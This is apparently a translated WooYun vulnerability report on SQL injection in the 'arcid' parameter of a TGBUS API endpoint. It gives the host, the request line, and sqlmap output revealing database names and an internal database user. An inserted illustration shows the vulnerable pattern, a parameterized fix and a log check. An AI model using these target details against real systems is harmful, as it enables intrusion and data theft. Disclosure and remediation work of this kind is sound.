Vulnerability summary

Defect ID: wooyun-2015-099550

Title: MySQL injection on a 电玩巴士 (TGBUS) site, UNION queries supported

Affected vendor: 电玩巴士

Author: Forever80s

Submitted: 2015-03-05 09:48

Fixed: 2015-04-20 14:22

Disclosed: 2015-04-20 14:22

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-03-05: Details sent to the vendor, awaiting vendor handling
2015-03-05: Vendor confirmed; details visible to the vendor only
2015-03-15: Details disclosed to core white hats and domain experts
2015-03-25: Details disclosed to regular white hats
2015-04-04: Details disclosed to intern white hats
2015-04-20: Details disclosed to the public

Summary:

Details:

Site: doubi.tgbus.com, injectable parameter: arcid

GET /api/index.do?single=doubi&callback=jQuery18300961274579167366_1425390140965&method=tgbus.doubi.login.init&arcid=28034&_=1425390145552 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US)
Accept: */*
Accept-Language: en-us,en;q=0.8,en-us,en;q=0.5
Cache-Control: no-cache
Host: doubi.tgbus.com
Accept-Encoding: gzip, deflate


POC (sqlmap output):

available databases [3]:
[*] information_schema
[*] test
[*] tgbus_db.mmo2
database management system users [1]:
[*] 'tgbus_db.mmo2'@'172.30.26.24'


Does not dumping data really mean a lower rank?

Database: `tgbus_db.mmo2`
[100 tables]
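As an added illustration, not part of the original report and not the site's own code: the flawed pattern behind this finding, an integer-looking `arcid` concatenated straight into the query, beside a hardened version that whitelists and binds the value, plus a simple access-log check that flags non-numeric `arcid` values. The schema, table names and request lines are constructed for the example.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed in-memory stand-in for the backend database (not the real schema).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE articles(id INTEGER PRIMARY KEY, title TEXT);
        CREATE TABLE users(uid INTEGER PRIMARY KEY, name TEXT, pwhash TEXT);
        INSERT INTO articles VALUES (28034, 'sample article');
        INSERT INTO users VALUES (1, 'admin', 'constructed-hash');
    """)
    return conn

def login_init_vulnerable(conn, arcid):
    # Flawed pattern: the untrusted arcid string becomes part of the SQL text,
    # so anything appended to the parameter (e.g. a UNION) is executed as SQL.
    sql = "SELECT id, title FROM articles WHERE id = " + arcid
    return conn.execute(sql).fetchall()

# arcid is an article id, so only a plain decimal integer is ever legitimate.
ARCID_RE = re.compile(r"^[0-9]{1,10}$")

def login_init_fixed(conn, arcid):
    # Hardened: reject anything that is not a bare integer, then bind the value
    # as a query parameter so the driver never interprets it as SQL.
    if not ARCID_RE.match(arcid):
        raise ValueError("invalid arcid")
    sql = "SELECT id, title FROM articles WHERE id = ?"
    return conn.execute(sql, (int(arcid),)).fetchall()

def flag_suspicious_arcid(request_targets):
    # Detection side: given request targets (path + query) pulled from an access
    # log, return those whose arcid is not a plain integer. parse_qs percent-decodes
    # the value, so encoded spaces, quotes and keywords are seen in the clear.
    flagged = []
    for target in request_targets:
        params = parse_qs(urlsplit(target).query)
        if any(not ARCID_RE.match(v) for v in params.get("arcid", [])):
            flagged.append(target)
    return flagged
```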

Proof of vulnerability:

Suggested fix:

Copyright notice: please credit Forever80s@WooYun when reposting


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability Rank: 8

Confirmed: 2015-03-05 10:09

Vendor reply:

Thanks to white hat "Forever80s" for the kind report. The bug has been confirmed and forwarded to development for maintenance.

Latest status:

None yet